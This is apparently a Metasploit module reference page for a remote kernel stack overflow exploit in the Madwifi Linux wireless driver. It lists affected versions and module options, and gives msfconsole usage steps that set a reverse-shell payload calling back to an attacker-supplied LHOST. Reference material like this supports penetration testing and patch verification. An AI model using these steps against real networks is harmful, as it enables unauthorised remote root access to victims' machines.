Madwifi SIOCGIWSCAN Buffer Overflow

The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information elements: WPA, RSN, WME and Atheros OUI. The current madwifi driver (0.9.2) and all madwifi-ng drivers since r1504 are vulnerable; the Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable: it doesn't crash the Wifi stack and can exploit the same machine multiple times without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.


Rank

  • Average

Authors

  • Julien Tinnes < julien at cr0.org >
  • Laurent Butti < 0x9090 at gmail.com >

Exploit Targets

  • 0 - Ubuntu 6.10
  • 1 - Generic (requires a non-randomized vDSO)

Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/madwifi/madwifi_giwscan_cb
msf exploit(madwifi_giwscan_cb) > show payloads
msf exploit(madwifi_giwscan_cb) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(madwifi_giwscan_cb) > set LHOST [MY IP ADDRESS]
msf exploit(madwifi_giwscan_cb) > show targets
msf exploit(madwifi_giwscan_cb) > set TARGET [TARGET ID]
msf exploit(madwifi_giwscan_cb) > exploit


Module Options

  • ADDR_DST - The MAC address of the target system (default: FF:FF:FF:FF:FF:FF)
  • CHANNEL - The initial channel (default: 11)
  • DRIVER - The name of the wireless driver for lorcon (default: autodetect)
  • INTERFACE - The name of the wireless interface (default: wlan0)
  • LENGTH - Length after local variables in giwscan_cb() to overwrite (default: 24)
  • RUNTIME - The number of seconds to run the attack (default: 600)
  • SINGLESHOT - Break after first victim (for msfcli) (default: false)
  • SSID - The SSID of the emulated access point (default: test)
  • ContextInformationFile - The information file that contains context information
  • DisablePayloadHandler - Disable the handler code for the selected payload
  • EnableContextEncoding - Use transient context when encoding payloads
  • VERBOSE - Enable detailed status messages
  • WORKSPACE - Specify the workspace for this module
  • WfsDelay - Additional delay when waiting for a session